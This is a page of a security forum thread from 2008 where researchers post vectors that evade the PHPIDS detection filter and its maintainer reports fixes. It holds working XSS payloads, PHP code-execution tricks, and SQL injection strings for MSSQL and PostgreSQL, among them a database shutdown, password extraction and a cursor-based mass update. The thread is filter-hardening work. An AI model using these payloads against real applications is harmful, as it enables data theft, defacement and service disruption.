Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1617181920212223242526...LastNext
Current Page: 21 of 31
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: July 30, 2008 06:00AM

question - what does the above do, and how does it work?

I assume it executes PHP code located at that link?



Edited 1 time(s). Last edit at 07/30/2008 06:00AM by Kyo.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: lpilorz
Date: July 30, 2008 10:01AM

It tries to upload your php file to attacked server. I think this advisory explains it best:
http://www.hardened-php.net/advisory_042006.119.html

This vector is useful against preg_replace and sometimes eval (bugs like: <?php eval('$var="'.addslashes($_GET['var']).'";'); ?>).

Simply:
{${function()}} substites ".function()."
`` substitutes shell_exec()

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: lpilorz
Date: July 30, 2008 10:15AM

And what you meant would rather look like:
http://www.securityfocus.com/archive/1/448007/100/0/threaded

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: July 30, 2008 05:00PM

Whatever it does - it's a nice circumvention. And it's fixed. Please excuse my late response but my workspace IP is still banned due to whatever reason so I can only respond from home (although I pinged id multiple times).

Thank you CM and Ipilorz - your comments and findings were great and are being reflected in the current trunk revision - I will mention you as usual in the next release notes!

@Kyo: Back ticks - love them.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: July 30, 2008 06:57PM

Oh right, so PHPIDS uses the /e flag at some point, then. Yeah, that makes it make sense again (though I did not know you could use ┬┤ in php)

Well that calms me, for a moment there I thought that I might be vulnerable. You never know, if you look at some of the shit PHP has done, security wise, in the past (particularly register globals...)

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: C1c4Tr1Z
Date: August 02, 2008 01:11AM

I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize it:

a>>/al/+/ert/|a(0)

Thanks!

EDIT: This vector doesn't seems to work! My browser is crazy :).



Edited 1 time(s). Last edit at 08/02/2008 01:42AM by C1c4Tr1Z.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thrill
Date: August 02, 2008 01:17AM

This is the right forum to post it.. good job boludo! :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 02, 2008 05:42AM

@C1c4Tr1Z

Doesn't seem to be a valid vector dude

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thrill
Date: August 02, 2008 10:23AM

@Gareth - He actually IM'd me and said that it worked the first 15 times, but then it stopped working and doesn't know why. He says his Eglish is not that good, but I don't believe him either.. ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: August 03, 2008 05:18AM

the only thing like that I got to work is
top[/alert/.source](0)|a
but that doesn't pass the filter

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 03, 2008 10:01AM

@all: I think a was accidentally assigned with alert or something else before - like:

a=alert
a>>/al/+/ert/|a(0)

Which of course results in an impact of 8 ;)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: C1c4Tr1Z
Date: August 03, 2008 01:06PM

@.mario: Yeah, i think that was the problem, because i was testing this vector from p42.us:

a=alert,a(0)

I was playing with something like this, but his impact is 35.:D

a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0)

bye!

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 03, 2008 04:31PM

Here's one technique which produces a impact of 4, it could be turned into a vector quite easily:-
1[<t>__par{new Array}ent__</t>][<t>al{new Array}ert</t>](1)

I love E4X :)

See if anyone can do it before mario reads it and fixes it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 03, 2008 05:12PM

read and fixed ;)

very nice tecnique btw!

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: August 04, 2008 09:55AM

C1c4Tr1Z Wrote:
Quote

@.mario: Yeah, i think that was the problem, because i was testing this vector from p42.us:
how exactly were you testing this from p42.us?

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: C1c4Tr1Z
Date: August 04, 2008 12:26PM

@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: August 04, 2008 08:34PM

@C1c4Tr1Z ah, i see. just wanted to make sure i hadn't been hacked or anything like that :)

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 07, 2008 12:36PM

MSSQL:
asd'; shutdown;

PostgreSQL:

The "null" seems to irritate the filter rules. this works perfectly on postgreSQL, because postgreSQL returns the output of the last stacked query.

asd'; select null,password,null from users;

PostgreSQL also supports union distinct select, which in combination with a "(" is not in the filter rules.

asd' union distinct(select null,password,null from users)--a

I think there are a lot more vectors possible with postgreSQL, its pretty flexible. for mssql there are some transactSQL injections possible, like

aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor

but since I found no way of declaring variables (declare @var varchar(32)) I cant build any cool vectors ;)

maybe someone else has some ideas, latest version with impact = 0:
aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user 
OPEN tablecursor FETCH NEXT FROM tablecursor INTO @a,@b WHILE(@a != null) 
@query  = null+null+null+null+ ' UPDATE '+null+@a+null+ ' SET id=null,@b = @payload'
BEGIN EXEC sp_executesql @query
FETCH NEXT FROM tablecursor INTO @a,@b END
CLOSE tablecursor DEALLOCATE tablecursor;
and some text, to get pass the centrifuge; and some more text.
whats missing is the correct concat of the @query with @b
@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'
but then I cant get around the centrifuge anymore ;) and of course the declaration of the vars.



Edited 2 time(s). Last edit at 08/07/2008 12:48PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: August 07, 2008 02:08PM

@reiners: impressive :)

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 07, 2008 03:02PM

Phew - impressive indeed! All fixed for now but I am sure there's more...

Thx!
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 07, 2008 06:31PM

some notes for the fixes:
Quote

asd' union distinct ( select null,password,(null)from user )-- a
still works, because distinct is missing in the filter:
Quote

(?:union\s*(?:all)?\s*[([]\s*select)
and the (null) evates the filter
Quote

(?:select\s[\s\w\.,-]+\sfrom)
note, that you can also do something like:
Quote

asd asd asd'; END; select(pass)from users
on MSSQL and PostgreSQL.

The CURSOR I declared in my previous post was maybe a bit misleading. the syntax is:
DECLARE yourcursorname CURSOR FOR yoursqlstatement

Too bad you are going to fix this, there is a lot of potential in those stored procedure type of injections.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 08, 2008 08:43AM

Thanks - fixed ;)

Do you know which characters are allowed for the cursornames? Just \w or . and - too?

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 08, 2008 04:37PM

just \w is allowed for cusornames.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 26, 2008 02:58PM

IE only window.name vector:-

<iframe name="expression(alert(1))" src="http://demo.phpids.org/?test=%28new%20Option%29.style.setExpression%281%2C1%26%26name%29"></iframe>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 26, 2008 04:23PM

Huh?

<edit>
Ah ;)
</edit>



Edited 1 time(s). Last edit at 08/26/2008 04:24PM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 26, 2008 04:29PM

Yeah sorry I couldn't be bothered uploading a file :)

uses window.name to execute

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 26, 2008 04:35PM

Very nice indeed! I didn't know yet that you could set expressions like that - shame on me ;) Fixed...

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 28, 2008 02:49PM

MSSQL allows [brackets] around column and table.

asd'; select [column] from users

edit:
ok, the above injection wouldnt work because of unclosed quotes. this one would do it:
asd'; select [column] from table where 1 like '1


edit┬▓:
note, that if you use brackets, whitespaces are not neccessary anymore:
asaa';SELECT[asd]FROM[asd]



Edited 2 time(s). Last edit at 08/31/2008 10:02AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 29, 2008 03:25PM

Another IE only vector

<iframe src=http://demo.phpids.org/?test=document.URL%3D1%26%26name name="javascript:alert(/Mmmmmm URL vector/)">

Uses window.name so the actual vector is:-
document.URL=1&&name

http://www.businessinfo.co.uk/labs/phpids/urlvector.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/01/2008 03:36AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 01, 2008 10:04AM

@Reiners: Nice find but damn - that's not easy to handle. I will think about a good way this weekend. Thanks!

@Gareth: whoops - somehow URL disappeared from one rule. Fixed - 10x!!

<edit>
@Reiners: What characters are allowed fom MSSQL col names? \w and - or more?
</edit>



Edited 1 time(s). Last edit at 09/01/2008 10:28AM by .mario.

Options: ReplyQuote
Pages: PreviousFirst...1617181920212223242526...LastNext
Current Page: 21 of 31


Sorry, only registered users may post in this forum.